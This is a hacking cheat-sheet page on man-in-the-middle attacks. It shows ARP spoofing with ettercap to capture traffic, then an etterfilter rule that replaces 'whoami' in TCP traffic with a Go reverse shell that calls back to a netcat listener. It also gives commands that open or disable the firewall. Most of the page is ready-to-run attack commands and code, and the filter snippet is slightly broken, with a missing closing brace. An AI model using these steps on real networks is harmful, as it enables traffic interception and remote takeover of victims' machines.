MITM (Man in the Middle) Attack

Last modified: 2022-12-01

Establish MITM

Using ARP Spoofing

In the target machine,

# -T: text only GUI
# -M: man-in-the-middle attack
# -w: write .pcap file
ettercap -T -i eth1 -M arp -w /tmp/ettercap.pcap
ettercap -T -i eth1 -M arp -w /tmp/ettercap.pcap

In your local machine, transfer the ettercap's output file.

scp victim@<target-ip>:/tmp/ettercap.pcap .

# Investigate the file
wireshark ettercap.pcap

Gain Access to a Shell

Reverse Shell Via ARP Spoofing

In the target machine, create "whoami.ecf" using Golang.

// whoami.ecf
if (ip.proto == TCP && tcp.src == 4444 && search(DATA.data, "whoami")) {
    log(DATA.data, "/root/ettercap.log");
    replace("whoami", "echo 'package main;import\"os/exec\";import\"net\";func main(){c,_:=net.Dial(\"tcp\",\"<target-eth1-ip>:6666\");cmd:=exec.Command(\"/bin/sh\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go &");
    msg("###### ETTERFILTER: substituted 'whoami' with reverse shell.  ######\n");

Compile the file using "etterfilter"

# Compile the file using etterfilter
etterfilter whoami.ecf -o whoami.ef

Open listener on background

nc -lvnp 6666 &

Disable Firewall for incoming connection

ufw allow in on eth1 from <target-ip> to <target-eth1-ip> port 6666 proto tcp
# or
ufw disable

Execute "ettercap" command.

# Run ettercap
# -F: Filter
ettercap -T -i eth1 -M arp -F whoami.ef

After a while, you should see "Connection received on <target-ip>" in the outputs.
If so, quit "ettercap" with "q" and switch the opening listener to foreground with "fg".
Then you can interecat with the target shell.

Protocol

Port Forwarding

WiFi

Attack

Tool

VPN

Others

MITM (Man in the Middle) Attack

Establish MITM

Using ARP Spoofing

Gain Access to a Shell

Reverse Shell Via ARP Spoofing

ON THIS PAGE